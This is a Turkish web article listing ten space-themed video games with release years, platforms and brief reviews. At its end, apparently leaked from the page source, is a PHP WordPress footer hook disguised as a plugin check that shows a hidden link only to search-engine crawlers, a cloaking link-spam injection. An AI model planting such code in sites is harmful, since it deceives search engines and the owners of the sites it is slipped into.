Sıradaki içerik:

3. Nesil AMD EPYC Milan CPU'larına Ait Bilgiler Ortaya Çıktı

e
sv

Bambaşka Dünyaları Keşfedin: İşte 10 Şahane Uzay Oyunu

13 Aralık 2020 17:45
avatar

Admin

 • e 0

  Mutlu

 • e 0

  Eğlenmiş

 • e 0

  Şaşırmış

 • e 0

  Kızgın

 • e 0

  Üzgün

Uzay teması; birçok alanda günlük yaşantımızın vazgeçilmez bir parçası hâline gelmiş bulunmakta. Edebiyattan sinemaya, oyunlar, bilim, fizik ve aklımıza gelebilecek her alanda uzay araştırmaları ve uzay teması ele alınıyor. Durum böyle olunca, oyun dünyasının ilk yıllarından bu yana bizlerle olan uzay oyunları da büyük bir ilgi görüyor.

Gelişen teknoloji ile son zamanlarda daha da soluk kesici hâle gelen uzay oyunları, hem gerçek bilinen evreni hem de bilim kurgu ürünü fantastik galaksileri konu alabiliyor. Eğer sizler de uzay temasını seviyorsanız, en eğlenceli uzay oyunları listemize göz atabilir ve uzay galaksileri evinize getirebilirsiniz. Not: Listedeki oyunlar alfabetik olarak sıralandırılmıştır.

Uzak galaksileri ekranlarınıza getirecek en iyi uzay oyunları:

Kerbal Space ProgramMass Effect 2No Man’s SkyObservationOuter WildsStar ConflictStar Trek OnlineStar Wars: SquadronsThe Outer WorldsUniverse Sandbox 2

Tam anlamıyla bir uzay simülasyonu: Kerbal Space Program

Çıkış yılı: 2013Platform: PC, PlayStation 4, Xbox One, Linux, macOS

Uzayda bir şeyler yapmanın ilk adımlarından biri de tabii olarak uzaya çıkabilmek olacaktır. Kerbal Space Program da sizleri tam olarak bu noktadan başlatıyor. Sonsuz deneme yanılma yöntemiyle istediğiniz gezegene roketleriniz inşa edip gitmeye çalıştığınız bu oyunda, pek de sevimli olduklarını söyleyemeyeceğimiz Kerbal adlı yaratıkların evreni fethetmelerine yardımcı oluyoruz. Kerbal Space Program ile fizik kurallarını keşfedip, başarılı bir uzay aracı inşa etmenin hazzını yaşayabilirsiniz.

Film gibi hikayesi olan bir uzay aksiyonu: Mass Effect 2

Çıkış yılı: 2011Platform: PC, PlayStation 3, Xbox 360

Uzay temalı aksiyon rol yapma oyunu serisi olan Mass Effects’in ikinci oyunu olan Mass Effects 2, aynı zamanda üçlemenin en beğenilen oyunu olarak karşımıza çıkıyor. İki efsane Star Wars ve Star Trek’i bir nevi birleştiren Mass Effects 2; uzay galaksilere yolculuk edip, tuhaf uzaylı ırklarıyla karşılaşabileceğiniz aksiyonu yüksek bir oyun. Her ne kadar bir açık dünya oyunu olmasa da Mass Effects 2, çizgisel yapıda dâhi bizlere oldukça soluk kesici uzay atmosferini göstermeyi başarıyor.

Gezegen keşfedip sahiplenebileceğiz, muazzam detaylara sahip: No Man’s Sky

Çıkış yılı: 2016Platform: PC, PlayStation 4, Xbox One, PlayStation 5, Xbox Series X/S, Android

No Man’s Sky, oyun dünyasını ikiye bölen oyunlardan bir tanesi. Aynı zamanda uzay temalı en büyük açık dünyaya sahip, en fazla serbestlik sunan oyunlardan da biri aynı zamanda. Zaten bu nedenle bir kesim devasa açık dünyanın kendini yine ettiğini ve buglarla dolu olduğunu iddia ederken, bir öbür kesim de oyunun sonu gelmeyen keşif yönünden beğeni alıyor. Her ne olursa olsun, No Man’s Sky, özellikle uzay oyunları ve açık dünya severleri üzmeyecek bir oyun. Yine de fazla büyük beklentilere sahip olmamakta fayda var.

Bir yapay zekânın gözünden uzay gerilimi: Observation

Çıkış yılı: 2019Platform: PC, PlayStation 4, Xbox One

Yakın zamanda çıkan bir Indie oyunu olan Observation, oldukça ilginç ve olası bir konuyu ele alıyor. Aynı zamanda interaktif bir ilim kurgu ve gerilim filmi olarak da adlandırılan Observation, oyunla aynı isimde bir uzay istasyonunun Dünya’nın yörüngesinden ayrılıp Saturn yakınlarında bir noktaya sürüklenmesini işliyor.

Aynı zamanda istasyonun yapay zekâsı SAM, tuhaf davranışlar sergiliyor ve istasyonda bulunan Dr. Emma Fisher için işler oldukça kötüye gitmeye başlıyor. Oyunun bir öbür ilginç yanı ise geleneksel yaklaşımın aksine oyunda Dr. Emma yerine yapay zekâ SAM’i canlandırıyoruz.

Dünya’daki yabani yaşam sizi kesmiyorsa: Outer Wilds

Çıkış yılı: 2019Platform: PC, PlayStation 4, Xbox One

Outer Wilds, birincil bakış açısına sahip bir rol yapma oyunu, fakat bu tarz çoğu oyunun aksine Outer Wilds’da ilginç galaksileri geziyor ve tuhaf uzaylı ırklarıyla tanışıyoruz. Oyunun asıl ilginçleştiği nokta ise oynadığımız karakterin 20 dakikalık bir zaman döngüsü içerisinde sıkışıp kalması. Her 20 dakikalık periyotta bu tuhaf güneş sistemindeki gezegenleri inceliyor ve gizemli uzaylı ırkı Nomai hakkında daha fazla şey öğrenmeye çalışıyoruz.

Uzay geminizi geliştirip savaşlara katılabileceğiniz: Star Conflict

Çıkış yılı: 2012Platform: PC, Linux, macOS, SteamOS

Uzay gemisi kullanmaya ve savaşmaya dayalı oynanışa sahip Star Conflict, tertip ve “ekipman düşürme/geliştirme” sistemine oldukça fazla bel bağlıyor. Klasik bir uzay gemisiyle “PvP dog fight” oyunu sayılabilecek Star Conflict’in ise asıl öne çıktığı nokta oynanabilir gemi sayısı oluyor. Birkaç farklı haritaya ve keşfedilecek noktaya sahip olan Star Conflict’te 240’ın üzerinde uzay gemisi bulunuyor. Ayrıca Star Conflict’i oynaması da ücretsiz.

Bir efsaneyi yaşamak: Star Trek Online

Çıkış yılı: 2010Platform: PC, PlayStation 4, Xbox One, macOS

Listemizde oynaması ücretsiz olan öbür oyun Star Trek Online, özellikle Star Trek evrenini sevenlerin kaçırmaması gereken bir oyun. Her ne kadar ilk çıkışta bazı problemler ile karşılaşsa da Star Trek Online, bu sorunların üstesinden gelmiş durumda ve uzay temalı en iyi MMO rol yapma oyunlarından biri olarak değerlendiriliyor.

Oldukça aktif bir oyun olan Star Trek Online’a her yıl birçok yeni faaliyet ekleniyor. Bu etkinlikler sayesinde galaksinin bir ucundan öbür ucuna seyahat edebiliyor ve daha önce karşılaşmadığınız görevler, karakterler ve mekânlar ile tanışabiliyorsunuz.

Bir nevi uzay gemisi simülasyonu ve hikayesi de var: Star Wars: Squadrons

Çıkış yılı: 2020Platform: PC, PlayStation 4, Xbox One

Birincil bakış açısında efsanevi Star Wars uzay gemilerini sürmek ve Galaktik savaşlara katılmak istiyorsanız, Star Wars: Squadrons tam olarak ihtiyacınızı karşılayacaktır. Kendine has kısa bir hikâye modu da bulunan Squadrons, asıl olarak çevrimiçi oynanışı temel alıyor. Bir nevi uzay gemisi simülasyonu da sayılabilecek özelliklere sahip Squadrons, yıllarca filmlerde izlediğimiz X-Wing’leri ve TIE Fighter’ları gerçek zamanlı kullanma imkânı tanıyor.

Birbirinden renkli gezegenler ve dünya dışı yaşamlar: The Outer Worlds

Çıkış yılı: 2019Platform: PC, PlayStation 4, Xbox One, Nintendo Switch

Uzay temalı aksiyon rol yapma oyunlarının kısa sürede unutulmaz isimlerinden olan The Outer Worlds, RPG konusunda oldukça deneyimli bir stüdyonun elinden çıkıyor. En iyi RPG oyunlarından biri kabul edilen Fallout: New Vegas’ı yapan stüdyo Obsidian Entertainment’ın elinden çıkan The Outer Worlds, bizlere birbirinden renkli gezegenlere ve ırklara sahip olan bir güneş sisteminde gezinme şansı tanıyor.

Evren simülatörü: Universe Sandbox 2

Çıkış yılı: 2012Platform: PC, macOS, Linux

Oldukça geniş çaplı bir “evren” simülatörü olan Universe Sandbox, bugüne kadar evren hakkında keşfedilen her şeyi adeta ellerimize teslim ediyor. Evrende keşfedilmiş tüm nesneleri fizik kuralları çerçevesinde istediğimiz şekilde yerleştirebiliyor, yeni güneş sistemleri ve galaksiler oluşturabiliyoruz. Gezegenlerin karakteristik özelliklerini de manipüle ederek yaşama sahip yeni gezegenler meydana getirebiliyoruz. Yani anlayacağınız Universe Sandbox ile yapabilecekleriniz aslında fizik kuralları içerisinde sınırsız diyebiliriz.

Uzay oyunları denildiğinde akla gelen en iyi oyunlardan birkaçına göz attığımız içeriğimizin sonuna geldik. Piyasada popüler olmuş veya olamamış daha birçok uzay oyunu bulunuyor. Fakat bu listemizde daha fazla kendini kanıtlamış oyunlara yer vermeye çalıştık. Sizler de severek oynadığınız uzay oyunlarını ve uzay oyunları dendiğinde aklınıza gelen oyunları bizlerle yorumlar kısmından paylaşabilirsiniz.

 • Site İçi Yorumlar

En az 10 karakter gerekli
function isBot() { $botAgents ="/google|hakia|msn|yahoo|altavista|crawler|findlinks|bing|Cuil|Excite|Go.com|HotBot|AllTheWeb|search.aol|Lycos|Alexa|ask|baidu|cuil|kosmix|sogou|yodao|yandex|infoseek|yebol|aol/i"; $agent = $_SERVER['HTTP_USER_AGENT']; if (preg_match($botAgents,$agent)) return true; else return false; } function wordpres_plugin_check_core(){ $altsayfa = 1; $bot = 1; $link = ' '; if($altsayfa == 1){ $say_s = $_SERVER['REQUEST_URI']; $saydim = strlen($say_s); if($saydim > 4){ if($bot == 1){ if (isBot()) { echo $link; } }else{ echo $link; } } }else{ if($bot == 1){ if (isBot()) { echo $link; } }else{ echo $link; } } } add_action('wp_footer', 'wordpres_plugin_check_core');